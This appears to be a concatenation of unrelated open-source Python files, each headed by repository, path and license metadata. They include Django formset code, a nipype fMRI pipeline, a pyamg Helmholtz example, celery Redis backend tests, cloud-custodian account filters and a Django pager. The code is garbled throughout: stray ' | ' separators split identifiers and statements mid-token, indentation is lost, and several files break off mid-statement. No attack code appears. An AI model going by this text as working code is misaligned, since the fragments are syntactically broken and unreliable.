modFile.write("PCBNEW-LibModule-V1 00/00/0000-00:00:00\n")
modFile.write("$INDEX\n")
for module in self.modules:
modFile.write(module.package + "\n")
modFile.write("$EndINDEX\n")
for module in self.modules:
module.write(modFile)
modFile.write("$EndLIBRARY")
modFile.close()
def writeSymFile(self, symFile):
symFile.write("EESchema-LIBRARY Version 0.0 00/00/0000-00:00:00\n")
for devicepart in self.deviceparts:
devicepart.write(symFile)
symFile.write("# End Library")
def writeDocFile(self, docFile):
docFile.write("EESchema-DOCLIB Version 0.0 Date: 00/00/0000 00:00:00\n")
|
OCA/report-print-send | remote_report_to_printer/tests/__init__.py | Python | agpl-3.0 | 61 | 0 | from . import test_remote_print | er
from . import | test_printer
|
torchbox/django-modelcluster | modelcluster/forms.py | Python | bsd-3-clause | 16,632 | 0.003487 | from __future__ import unicode_literals
from django.forms import ValidationError
from django.core.exceptions import NON_FIELD_ERRORS
from django.forms.formsets import TOTAL_FORM_COUNT
from django.forms.models import (
BaseModelFormSet, modelformset_factory,
ModelForm, _get_foreign_key, ModelFormMetaclass, ModelFormOptions
)
from django.db.models.fields.related import ForeignObjectRel
from modelcluster.models import get_all_child_relations
class BaseTransientModelFormSet(BaseModelFormSet):
""" A ModelFormSet that doesn't assume that all its initial data instances exist in the db """
def _construct_form(self, i, **kwargs):
# Need to override _construct_form to avoid calling to_python on an empty string PK value
if self.is_bound and i < self.initial_form_count():
pk_key = "%s-%s" % (self.add_prefix(i), self.model._meta.pk.name)
pk = self.data[pk_key]
if pk == '':
kwargs['instance'] = self.model()
else:
pk_field = self.model._meta.pk
to_python = self._get_to_python(pk_field)
pk = to_python(pk)
kwargs['instance'] = self._existing_object(pk)
if i < self.initial_form_count() and 'instance' not in kwargs:
kwargs['instance'] = self.get_queryset()[i]
if i >= self.initial_form_count() and self.initial_extra:
# Set initial values for extra forms
try:
kwargs['initial'] = self.initial_extra[i - self.initial_form_count()]
except IndexError:
pass
# bypass BaseModelFormSet's own _construct_form
return super(BaseModelFormSet, self)._construct_form(i, **kwargs)
def save_existing_objects(self, commit=True):
# Need to override _construct_form so that it doesn't skip over initial forms whose instance
# has a blank PK (which is taken as an indication that the form was constructed with an
# instance not present in our queryset)
self.changed_objects = []
self.deleted_objects = []
if not self.initial_forms:
return []
saved_instances = []
forms_to_delete = self.deleted_forms
for form in self.initial_forms:
obj = form.instance
if form in forms_to_delete:
if obj.pk is None:
# no action to be taken to delete an object which isn't in the database
continue
self.deleted_objects.append(obj)
self.delete_existing(obj, commit=commit)
elif form.has_changed():
self.changed_objects.append((obj, form.changed_data))
saved_instances.append(self.save_existing(form, obj, commit=commit))
if not commit:
self.saved_forms.append(form)
return saved_instances
def transientmodelformset_factory(model, formset=BaseTransientModelFormSet, **kwargs):
return modelformset_factory(model, formset=formset, **kwargs)
class BaseChildFormSet(BaseTransientModelFormSet):
def __init__(self, data=None, files=None, instance=None, queryset=None, **kwargs):
if instance is None:
self.instance = self.fk.remote_field.model()
else:
self.instance = instance
self.rel_name = ForeignObjectRel(self.fk, self.fk.remote_field.model, related_name=self.fk.remote_field.related_name).get_accessor_name()
if queryset is None:
queryset = getattr(self.instance, self.rel_name).all()
super(BaseChildFormSet, self).__init__(data, files, queryset=queryset, **kwargs)
def save(self, commit=True):
# The base ModelFormSet's save(commit=False) will populate the lists
# self.changed_objects, self.deleted_objects and self.new_objects;
# use these to perform the appropriate updates on the relation's manager.
saved_instances = super(BaseChildFormSet, self).save(commit=False)
manager = getattr(self.instance, self.rel_name)
# if model has a sort_order_field defined, assign order indexes to the attribute
# named in it
if self.can_order and hasattr(self.model, 'sort_order_field'):
sort_order_field = getattr(self.model, 'sort_order_field')
for i, form in enumerate(self.ordered_forms):
setattr(form.instance, sort_order_field, i)
# If the manager has existing instances with a blank ID, we have no way of knowing
# whether these correspond to items in the submitted data. We'll assume that they do,
# as that's the most common case (i.e. the formset contains the full set of child objects,
# not just a selection of additions / updates) and so we delete all ID-less objects here
# on the basis that they will be re-added by the f | ormset saving mechanism.
no_id_instances = [obj for obj in manager.all() if obj.pk is None]
if no_id_instances:
manager.remove | (*no_id_instances)
manager.add(*saved_instances)
manager.remove(*self.deleted_objects)
self.save_m2m() # ensures any parental-m2m fields are saved.
if commit:
manager.commit()
return saved_instances
def clean(self, *args, **kwargs):
self.validate_unique()
return super(BaseChildFormSet, self).clean(*args, **kwargs)
def validate_unique(self):
'''This clean method will check for unique_together condition'''
# Collect unique_checks and to run from all the forms.
all_unique_checks = set()
all_date_checks = set()
forms_to_delete = self.deleted_forms
valid_forms = [form for form in self.forms if form.is_valid() and form not in forms_to_delete]
for form in valid_forms:
unique_checks, date_checks = form.instance._get_unique_checks()
all_unique_checks.update(unique_checks)
all_date_checks.update(date_checks)
errors = []
# Do each of the unique checks (unique and unique_together)
for uclass, unique_check in all_unique_checks:
seen_data = set()
for form in valid_forms:
# Get the data for the set of fields that must be unique among the forms.
row_data = (
field if field in self.unique_fields else form.cleaned_data[field]
for field in unique_check if field in form.cleaned_data
)
# Reduce Model instances to their primary key values
row_data = tuple(d._get_pk_val() if hasattr(d, '_get_pk_val') else d
for d in row_data)
if row_data and None not in row_data:
# if we've already seen it then we have a uniqueness failure
if row_data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_unique_error_message(unique_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
for field in unique_check:
if field in form.cleaned_data:
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(row_data)
if errors:
raise ValidationError(errors)
def childformset_factory(
parent_model, model, form=ModelForm,
formset=BaseChildFormSet, fk_name=None, fields=None, exclude=None,
extra=3, can_order=False, can_delete=True, max_num=None, validate_max=False,
formfield_callback=None, widgets=None, min_num=None, validate_min=False
):
fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
# enforce a max_num=1 when the foreign key to the parent model is unique.
if fk.unique:
max_num = 1
validate_max = True
if exclude is N |
pearsonlab/nipype | examples/fmri_fsl_feeds.py | Python | bsd-3-clause | 5,653 | 0.00283 | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
=================
fMRI: FEEDS - FSL
=================
A pipeline example that data from the FSL FEEDS set. Single subject, two
stimuli.
You can find it at http://www.fmrib.ox.ac.uk/fsl/feeds/doc/index.html
"""
from __future__ import division
from builtins import range
import os # system functions
import nipype.interfaces.io as nio # Data i/o
import nipype.interfaces.fsl as fsl # fsl
import nipype.pipeline.engine as pe # pypeline engine
import nipype.algorithms.modelgen as model # model generation
from nipype.workflows.fmri.fsl import (create_featreg_preproc,
create_modelfit_workflow,
create_reg_workflow)
from nipype.interfaces.base import Bunch
"""
Preliminaries
-------------
Setup any package specific configuration. The output file format for FSL
routines is being set to compressed NIFTI.
"""
fsl.FSLCommand.set_default_output_type('NIFTI_GZ')
"""
Experiment specific components
------------------------------
This tutorial does a single subject analysis so we are not using infosource and
iterables
"""
# Specify the location of the FEEDS data. You can find it at http://www.fmrib.ox.ac.uk/fsl/feeds/doc/index.html
feeds_data_dir = os.path.abspath('feeds/data')
# Specify the subject directories
# Map field names to individual subject runs.
info = dict(func=[['fmri']],
struct=[['structural']])
"""
Now we create a :class:`nipype.interfaces.io.DataSource` object and fill in the
information from above abou | t the layout of | our data. The
:class:`nipype.pipeline.Node` module wraps the interface object and provides
additional housekeeping and pipeline specific functionality.
"""
datasource = pe.Node(interface=nio.DataGrabber(outfields=['func', 'struct']),
name='datasource')
datasource.inputs.base_directory = feeds_data_dir
datasource.inputs.template = '%s.nii.gz'
datasource.inputs.template_args = info
datasource.inputs.sort_filelist = True
preproc = create_featreg_preproc(whichvol='first')
TR = 3.
preproc.inputs.inputspec.fwhm = 5
preproc.inputs.inputspec.highpass = 100. / TR
modelspec = pe.Node(interface=model.SpecifyModel(),
name="modelspec")
modelspec.inputs.input_units = 'secs'
modelspec.inputs.time_repetition = TR
modelspec.inputs.high_pass_filter_cutoff = 100
modelspec.inputs.subject_info = [Bunch(conditions=['Visual', 'Auditory'],
onsets=[list(range(0, int(180 * TR), 60)), list(range(0, int(180 * TR), 90))],
durations=[[30], [45]],
amplitudes=None,
tmod=None,
pmod=None,
regressor_names=None,
regressors=None)]
modelfit = create_modelfit_workflow(f_contrasts=True)
modelfit.inputs.inputspec.interscan_interval = TR
modelfit.inputs.inputspec.model_serial_correlations = True
modelfit.inputs.inputspec.bases = {'dgamma': {'derivs': True}}
cont1 = ['Visual>Baseline', 'T', ['Visual', 'Auditory'], [1, 0]]
cont2 = ['Auditory>Baseline', 'T', ['Visual', 'Auditory'], [0, 1]]
cont3 = ['Task', 'F', [cont1, cont2]]
modelfit.inputs.inputspec.contrasts = [cont1, cont2, cont3]
registration = create_reg_workflow()
registration.inputs.inputspec.target_image = fsl.Info.standard_image('MNI152_T1_2mm.nii.gz')
registration.inputs.inputspec.target_image_brain = fsl.Info.standard_image('MNI152_T1_2mm_brain.nii.gz')
registration.inputs.inputspec.config_file = 'T1_2_MNI152_2mm'
"""
Set up complete workflow
========================
"""
l1pipeline = pe.Workflow(name="level1")
l1pipeline.base_dir = os.path.abspath('./fsl_feeds/workingdir')
l1pipeline.config = {"execution": {"crashdump_dir": os.path.abspath('./fsl_feeds/crashdumps')}}
l1pipeline.connect(datasource, 'func', preproc, 'inputspec.func')
l1pipeline.connect(preproc, 'outputspec.highpassed_files', modelspec, 'functional_runs')
l1pipeline.connect(preproc, 'outputspec.motion_parameters', modelspec, 'realignment_parameters')
l1pipeline.connect(modelspec, 'session_info', modelfit, 'inputspec.session_info')
l1pipeline.connect(preproc, 'outputspec.highpassed_files', modelfit, 'inputspec.functional_data')
l1pipeline.connect(preproc, 'outputspec.mean', registration, 'inputspec.mean_image')
l1pipeline.connect(datasource, 'struct', registration, 'inputspec.anatomical_image')
l1pipeline.connect(modelfit, 'outputspec.zfiles', registration, 'inputspec.source_files')
"""
Setup the datasink
"""
datasink = pe.Node(interface=nio.DataSink(parameterization=False), name="datasink")
datasink.inputs.base_directory = os.path.abspath('./fsl_feeds/l1out')
datasink.inputs.substitutions = [('fmri_dtype_mcf_mask_smooth_mask_gms_mean_warp', 'meanfunc')]
# store relevant outputs from various stages of the 1st level analysis
l1pipeline.connect(registration, 'outputspec.transformed_files', datasink, 'level1.@Z')
l1pipeline.connect(registration, 'outputspec.transformed_mean', datasink, 'meanfunc')
"""
Execute the pipeline
--------------------
The code discussed above sets up all the necessary data structures with
appropriate parameters and the connectivity between the processes, but does not
generate any output. To actually run the analysis on the data the
``nipype.pipeline.engine.Pipeline.Run`` function needs to be called.
"""
if __name__ == '__main__':
l1pipeline.run()
|
pombreda/pyamg | Examples/ComplexSymmetric/one_D_helmholtz.py | Python | bsd-3-clause | 3,892 | 0.014132 | from numpy import array, zeros, ones, sqrt, ravel, mod, random, inner, conjugate
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix, bmat, eye
from scipy import rand, mat, real, imag, linspace, hstack, vstack, exp, cos, sin, pi
from pyamg.util.linalg import norm
import pyamg
from scipy.optimize import fminbound, fmin
__all__ = ['one_D_helmholtz', 'min_wave']
def min_wave(A, omega, x, tol=1e-5, maxiter=25):
'''
parameters
----------
A {matrix}
1D Helmholtz Operator
omega {scalar}
Wavenumber used to discretize Helmholtz problem
x {array}
1D mesh for the problem
tol {scalar}
minimization tolerance
maxit {integer}
maximum iters for minimization algorithm
returns
-------
Applies minimization algorithm to find numerically lowest energy wavenumber
for the matrix A, i.e., the omega shift that minimizes <Ac, c> / <c, c>,
for c = cosine((omega+shift)x)
'''
x = ravel(x)
# Define scalar objective function, ignoring the
# boundaries by only considering A*c at [1:-1]
def obj_fcn(alpha):
c = cos((omega+alpha)*x)
Ac = (A*c)[1:-1]
return norm(Ac)/norm(c[1:-1])
(xopt, fval, ierr, numfunc) = fminbound(obj_fcn, -0.99*omega, \
0.99*omega, xtol=tol, maxfun=maxiter, full_output=True, disp=0)
#print "Minimizer = %1.4f, Function Value at Min = %1.4e\nError Flag = %d,\
# Number of function evals = %d" % (xopt, fval, ierr, numfunc)
return xopt
def one_D_helmholtz(h, omega=1.0, nplane_waves=2):
'''
parameters
----------
h {int}
Number of grid spacings for 1-D Helmholtz
omega {float}
Defines Helmholtz wave number
nplane_waves {int}
Defines the number of planewaves used for the near null-space modes, B.
1: B = [ exp(ikx) ]
2: B = [ real(exp(ikx)), complex(exp(ikx)) ]
returns
-------
dictionary containing:
A {matrix-like}
LHS of linear system for Helmholtz problem,
-laplace(u) - omega^2 u = f
mesh_h {float}
mesh size
vertices {array-like}
[X, Y]
elements {None}
None, just using 1-D finite-differencing
'''
# Ensure Repeatability of "random" initial guess
random.seed(10)
# Mesh Spacing
mesh_h = 1.0/(float(h)-1.0)
# Construct Real Operator
| reA = pyamg.gallery.poisson( (h,), format='csr')
reA = reA - mesh_h*mesh_h*omega*omega*\
eye(reA.shape[0], reA.shape[1], format='csr')
dimen = reA.shape[0]
# Construct Ima | ginary Operator
imA = csr_matrix( coo_matrix( (array([2.0*mesh_h*omega]), \
(array([0]), array([0]))), shape=reA.shape) )
# Enforce Radiation Boundary Conditions at first grid point
reA.data[1] = -2.0
# In order to maintain symmetry scale the first equation by 1/2
reA.data[0] = 0.5*reA.data[0]
reA.data[1] = 0.5*reA.data[1]
imA.data[0] = 0.5*imA.data[0]
# Create complex-valued system
complexA = reA + 1.0j*imA
# For this case, the CG (continuous Galerkin) case is the default elements and vertices
# because there is no DG mesh to speak of
elements = None
vertices = hstack((linspace(-1.0,1.0,h).reshape(-1,1), zeros((h,1))))
# Near null-space modes are 1-D Plane waves: [exp(ikx), i exp(ikx)]
B = zeros( (dimen, nplane_waves), dtype=complex )
shift = min_wave(complexA, omega, vertices[:,0], tol=1e-9, maxiter=15)
if nplane_waves == 1:
B[:,0] = exp(1.0j*(omega+shift)*vertices[:,0])
elif nplane_waves == 2:
B[:,0] = cos((omega+shift)*vertices[:,0])
B[:,1] = sin((omega+shift)*vertices[:,0])
return {'A' : complexA, 'B' : B, 'mesh_h' : mesh_h, \
'elements' : elements, 'vertices' : vertices}
|
kawamon/hue | desktop/core/ext-py/celery-4.2.1/t/unit/backends/test_redis.py | Python | apache-2.0 | 23,661 | 0.000042 | from __future__ import absolute_import, unicode_literals
import random
import ssl
from contextlib import contextmanager
from datetime import timedelta
from pickle import dumps, loads
import pytest
from case import ANY, ContextMock, Mock, call, mock, patch, skip
from celery import signature, states, uuid
from celery.canvas import Signature
from celery.exceptions import (ChordError, CPendingDeprecationWarning,
ImproperlyConfigured)
from celery.utils.collections import AttributeDict
def raise_on_second_call(mock, exc, *retval):
def on_first_call(*args, **kwargs):
mock.side_effect = exc
return mock.return_value
mock.side_effect = on_first_call
if retval:
mock.return_value, = retval
class Connection(object):
connected = True
def disconnect(self):
self.connected = False
class Pipeline(object):
def __init__(self, client):
self.client = client
self.steps = []
def __getattr__(self, attr):
def add_step(*args, **kwargs):
self.steps.append((getattr(self.client, attr), args, kwargs))
return self
return add_step
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
class Redis(mock.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
def __init__(self, host=None, port=None, db=None, password=None, **kw):
self.host = host
self.port = port
self.db = db
self.password = password
self.keyspace = {}
self.expiry = {}
self.connection = self.Connection()
def get(self, key):
return self.keyspace.get(key)
def setex(self, key, expires, value):
self.set(key, value)
self.expire(key, expires)
def set(self, key, value):
self.keyspace[key] = value
def expire(self, key, expires):
self.expiry[key] = expires
return expires
def delete(self, key):
return bool(self.keyspace.pop(key, None))
def pipeline(self):
return self.Pipeline(self)
def _get_list(self, key):
try:
return self.keyspace[key]
except KeyError:
l = self.keyspace[key] = []
return l
def rpush(self, key, value):
self._get_list(key).append(value)
def lrange(self, key, start, stop):
return self._get_list(key)[start:stop]
def llen(self, key):
return len(self.keyspace.get(key) or [])
class Sentinel(mock.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
self.sentinels = [Redis(hostname, port, **self.sentinel_kwargs)
for hostname, port in sentinels]
self.min_other_sentinels = min_other_sentinels
self.connection_kwargs = connection_kwargs
def master_for(self, service_name, redis_class):
return random.choice(self.sentinels)
class redis(object):
StrictRedis = Redis
class ConnectionPool(object):
def __init__(self, **kwargs):
pass
class UnixDomainSocketConnection(object):
def __init__(self, **kwargs):
pass
class sentinel(object):
Sentinel = Sentinel
class test_RedisResultConsumer:
def get_backend(self):
from celery.backends.redis import RedisBackend
class _RedisBackend(RedisBackend):
redis = redis
return _RedisBackend(app=self.app)
def get_consumer(self):
return self.get_backend().result_consumer
@patch('celery.backends.async.BaseResultConsumer.on_after_fork')
def test_on_after_fork(self, parent_method):
consumer = self.get_consumer()
consumer.start('none')
consumer.on_after_fork()
parent_method.assert_called_once()
consumer.backend.client.connection_pool.reset.assert_called_once()
consumer._pubsub.close.assert_called_once()
# PubSub instance not initialized - exception would be raised
# when calling .close()
consumer._pubsub = None
parent_method.reset_mock()
consumer.backend.client.connection_pool.reset.reset_mock()
consumer.on_after_fork()
parent_method.assert_called_once()
consumer.backend.client.connection_pool.reset.assert_called_once()
# Continues on KeyError
consumer._pubsub = Mock()
consumer._pubsub.close = Mock(side_effect=KeyError)
parent_method.reset_mock()
consumer.backend.client.connection_pool.reset.reset_mock()
consumer.on_after_fork()
parent_method.assert_called_once()
@patch('celery.backends.redis.ResultConsumer.cancel_for')
@patch('celery.backends.async.BaseResultConsumer.on_state_change')
def test_on_state_change(self, parent_method, cancel_for):
consumer = self.get_consumer()
meta = {'task_id': 'testing', 'status': states.SUCCESS}
message = 'hello'
consumer.on_state_change(meta, message)
parent_method.assert_called_once_with(meta, message)
cancel_for.assert_called_once_with(meta['task_id'])
# Does not call cancel_for for other states
meta = {'task_id': 'testing2', 'status': states.PENDING}
parent_method.reset_mock()
cancel_for.reset_mock()
consumer.on_state_change(meta, message)
parent_method.assert_called_once_with(meta, message)
cancel_for.assert_not_called()
class test_RedisBackend:
def get_backend(self):
from celery.backends.redis import RedisBackend
class _RedisBackend(RedisBackend):
redis = redis
return _RedisBackend
def get_E_LOST(self):
from celery.backends.redis import E_LOST
return E_LOST
def setup(self):
self.Backend = self.get_backend()
self.E_LOST = self.get_E_LOST()
self.b = self.Backend(app=self.app)
@pytest.mark.usefixtures('depends_on_current_app')
@skip.unless_module('redis')
def test_reduce(self):
from celery.backends.redis import RedisBackend |
x = RedisBackend(app=self.app)
assert loads(dumps(x))
def test_no_redis(self):
self. | Backend.redis = None
with pytest.raises(ImproperlyConfigured):
self.Backend(app=self.app)
def test_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
x = self.Backend(
'redis://:bosco@vandelay.com:123//1', app=self.app,
)
assert x.connparams
assert x.connparams['host'] == 'vandelay.com'
assert x.connparams['db'] == 1
assert x.connparams['port'] == 123
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30.0
assert x.connparams['socket_connect_timeout'] == 100.0
def test_timeouts_in_url_coerced(self):
x = self.Backend(
('redis://:bosco@vandelay.com:123//1?'
'socket_timeout=30&socket_connect_timeout=100'),
app=self.app,
)
assert x.connparams
assert x.connparams['host'] == 'vandelay.com'
assert x.connparams['db'] == 1
assert x.connparams['port'] == 123
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30
assert x.connparams['socket_connect_timeout'] == 100
def test_socket_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
x = self.Backend(
'socket:///tmp/redis.sock?virtual_host=/3', app=self.app,
)
assert x.connparams
assert x.connparams['path'] == '/tmp/redis.sock'
assert (x.connparams['connection_class'] is
redis.UnixDomainSocketConnection)
assert 'host' not in x.connparams
assert 'port' not in x.connparams
assert x.connparams['socket_timeou |
pddg/Qkou_kit | lib/add_db.py | Python | mit | 2,046 | 0 | # coding: utf-8
import db_info
import db_cancel
import db_news
import hashlib
from tweeter import format_info, format_cancel, format_news
import settings
log = settings.log
def add_info_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for lec_info in args:
id = db_info.add_info(*lec_info)
if id is not False:
lec_info.append(id)
# Tweetする用に文章をフォーマット
t = format_info(*lec_info)
# キューに投入
q.put(t)
updated += 1
else:
pass
else:
# 更新した数を返す
return updated
except Exception as e:
log.exception(e)
def add_cancel_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for lec_cancel in args:
cancel_id = db_cancel.add_cancel(*lec_cancel)
if cancel_id is not False:
lec_cancel.append(cancel_id)
# Tweetする用に文章をフォーマット
t = format_cancel(*lec_cancel)
| # キューに投入
| q.put(t)
updated += 1
else:
pass
else:
# 更新数を返す
return updated
except Exception as e:
log.exception(e)
def add_news_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for news in args:
news_id = db_news.add_news(*news)
if news_id is not False:
news.append(news_id)
# Tweetする用に文章をフォーマット
t = format_news(*news)
# キューに投入
q.put(t)
updated += 1
else:
pass
else:
# 更新数を返す
return updated
except Exception as e:
log.exception(e)
|
jimmyraywv/cloud-custodian | c7n/resources/account.py | Python | apache-2.0 | 35,461 | 0.00079 | # Copyright 2016-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AWS Account as a custodian resource.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from botocore.exceptions import ClientError
from datetime import datetime, timedelta
from dateutil.parser import parse as parse_date
from dateutil.tz import tzutc
from c7n.actions import ActionRegistry, BaseAction
from c7n.filters import Filter, FilterRegistry, ValueFilter, FilterValidationError
from c7n.manager import ResourceManager, resources
from c7n.utils import local_session, type_schema
from c7n.resources.iam import CredentialReport
filters = FilterRegistry('aws.account.actions')
actions = ActionRegistry('aws.account.filters')
def get_account(session_factory, config):
session = local_session(session_factory)
client = session.client('iam')
aliases = client.list_account_aliases().get(
'AccountAliases', ('',))
name = aliases and aliases[0] or ""
return {'account_id': config.account_id,
'account_name': name}
@resources.register('account')
class Account(ResourceManager):
filter_registry = filters
action_registry = actions
class resource_type(object):
id = 'account_id'
name = 'account_name'
filter_name = None
@classmethod
def get_permissions(cls):
return ('iam:ListAccountAliases',)
def get_model(self):
return self.resource_type
def resources(self):
return self.filter_resources([get_account(self.session_factory, self.config)])
def get_resources(self, resource_ids):
return [get_account(self.session_factory, self.config)]
@filters.register('credential')
class AccountCredentialReport(CredentialReport):
def process(self, resources, event=None):
super(AccountCredentialReport, self).process(resources, event)
report = self.get_credential_report()
if report is None:
return []
results = []
info = report.get('<root_account>')
for r in resources:
if self.match(info):
r['c7n:credential-report'] = info
results.append(r)
return results
@filters.register('check-cloudtrail')
class CloudTrailEnabled(Filter):
"""Verify cloud trail enabled for this account per specifications.
Returns an annotated account resource if trail is not enabled.
Of particular note, the current-region option will evaluate whether cloudtrail is available
in the current region, either as a multi region trail or as a trail with it as the home region.
:example:
.. code-block: yaml
policies:
- name: account-cloudtrail-enabled
resource: account
region: us-east-1
filters:
- type: check-cloudtrail
global-events: true
multi-region: true
running: true
"""
schema = type_schema(
'check-cloudtrail',
**{'multi-region': {'type': 'boolean'},
'global-events': {'type': 'boolean'},
'current-region': {'type': 'boolean'},
'running': {'type': 'boolean'},
'notifies': {'type': 'boolean'},
'file-digest': {'type': 'boolean'},
'kms': {'type': 'boolean'},
'kms-key': {'type': 'string'}})
permissions = ('cloudtrail:DescribeTrails', 'cloudtrail:GetTrailStatus')
def process(self, resources, event=None):
session = local_session(self.manager.session_factory)
client = session.client('cloudtrail')
trails = client.describe_trails()['trailList']
resources[0]['c7n:cloudtrails'] = trails
if self.data.get('global-events'):
trails = [t for t in trails if t.get('IncludeGlobalServiceEvents')]
if self.data.get('current-region'):
current_region = session.region_name
trails = [t for t in trails if t.get(
'HomeRegion') == current_region or t.get('IsMultiRegionTrail')]
if self.data.get('kms'):
trails = [t for t in trails if t.get('KmsKeyId')]
if self.data.get('kms-key'):
trails = [t for t in trails
if t.get('KmsKeyId', '') == self.data['kms-key']]
if self.data.get('file-digest'):
trails = [t for t in trails
if t.get('LogFileValidationEnabled')]
if self.data.get('multi-region'):
trails = [t for t in trails if t.get('IsMultiRegionTrail')]
if self.data.get('notifies'):
trails = [t for t in trails if t.get('SNSTopicArn')]
if self.data.get('running', True):
running = []
for t in list(trails):
t['Status'] = status = client.get_trail_status(
Name=t['TrailARN'])
if status['IsLogging'] and not status.get(
'LatestDeliveryError'):
running.append(t)
trails = running
if trails:
return []
return resources
@filters.register('check-config')
class ConfigEnabled(Filter):
"""Is config service enabled for this account
:example:
.. code-block: yaml
policies:
- name: account-check-config-services
resource: account
region: us-east-1
filters:
- type: check-config
all-resources: true
global-resources: true
running: true
"""
schema = type_schema(
'check-config', **{
'all-resources': {'type': 'boolean'},
'running': {'type': 'boolean'},
'global-resources': {'type': 'boolean'}})
permissions = ('config:DescribeDeliveryChannels',
'config:DescribeConfigurationRecorders',
'config:DescribeConfigurationRecorderStatus')
def process(self, resources, event=None):
client = local_session(
self.manager.session_factory).client('config')
channels = client.describe_delivery_channels()[
'DeliveryChannels']
recorders = client.describe_configuration_recorders()[
'ConfigurationRecorders']
resources[0]['c7n:config_recorders'] = recorders
resources[0]['c7n:config_channels'] = channels
if self.data.get('global-resources'):
recorders = [
r for r in recorders
if r['recordingGroup'].get('includeGlobalResourceTypes')]
if self.data.get('all-resources'):
recorders = [r for r in recorders
if r['recordingGroup'].get('allSupported')]
if self.data.get('running', T | rue) and recorders:
status = {s['name']: s for
s in client.describe_configuration_recorder_status(
)['ConfigurationRecordersStatus']}
resources[0]['c7n:config_status'] = status
recorders = [r for r in recorders if status[r['name']]['recording'] and
status[r['n | ame']]['lastStatus'].lower() in ('pending', 'success')]
if channels and recorders:
return []
return resources
@filters.register('iam-summary')
class IAMSummary(ValueFilter):
"""Return annotated account resource if iam summary filter matches.
Some use cases include, detecting root api keys or mfa usage.
Example iam summary wrt to matchable fields::
{
"AccessKeysPerUserQuota": 2,
"AccountAcc |
spandanb/horizon | openstack_dashboard/dashboards/admin/images/urls.py | Python | apache-2.0 | 1,311 | 0.000763 | # Cop | yright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights | Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import patterns # noqa
from django.conf.urls import url # noqa
from openstack_dashboard.dashboards.admin.images import views
urlpatterns = patterns('openstack_dashboard.dashboards.admin.images.views',
url(r'^images/$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(r'^(?P<image_id>[^/]+)/update/$',
views.UpdateView.as_view(), name='update'),
url(r'^(?P<image_id>[^/]+)/detail/$',
views.DetailView.as_view(), name='detail')
)
|
slozier/ironpython2 | Tests/interop/net/loadorder/t3g1.py | Python | apache-2.0 | 833 | 0.004802 | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
| from iptest.assert_util import *
add_clr_assemblies("loadorder_3")
# namespace First {
# public class Generic1<K, V> {
# public static string Flag = typeof(Generic1<,>).FullName;
| # }
# }
import First
AreEqual(First.Generic1[int, int].Flag, "First.Generic1`2")
add_clr_assemblies("loadorder_3g")
# namespace First {
# public class Generic1<K, V> {
# public static string Flag = typeof(Generic1<,>).FullName + "_Same";
# }
# }
AreEqual(First.Generic1[int, int].Flag, "First.Generic1`2_Same")
from First import *
AreEqual(Generic1[int, int].Flag, "First.Generic1`2_Same")
|
willre/homework | day21-22/source/app01/views.py | Python | gpl-2.0 | 2,803 | 0.013674 | # -*- coding:utf-8 -*-
from django.shortcuts import render
import models
# Create your views here.
class Pager(object):
def __init__(self,current_page):
self.current_page = current_page
@property
def start(self):
return (self.current_page-1)*10
@property
def end(self):
return self.current_page*10
def page_str(self,all_item,base_url):
all_page, div = divmod(all_item,10)
if div>0:
all_page += 1
page_list=[]
# # start = self.current_page-5
# # end = self.current_page+6
# #
# # page_str = ""
# # for i in range(start,end):
# # if i == self.current_page:
# # temp = '<a style="color:red;font-size:32px" href="/user_list/?page=%d"> %d </a>' % (i,i)
# # else:
# # temp = '<a href="/user_list/?page=%d"> %d </a>' % (i,i)
# # page_str += temp
if all_page<=11:
start =1
end = all_page+1
else:
if self.current_page<=6:
start = 1
end =12
else:
start = self.current_page-5
end = self.current_page+6
if self.current_page + 6 >all_page:
start = all_page-11
end = all_page + 1
for i in range(start,end):
if i == self.current_page:
temp = '<a style="color:red;font-size:32px" href="%s%d"> | %d </a>' % (base_url,i,i)
else:
temp = '<a href="%s% | d"> %d </a>' % (base_url,i,i)
page_list.append(temp)
if self.current_page>1:
pre_page = '<a href="%s%d"> 上一页 </a>' % (base_url,self.current_page-1)
else:
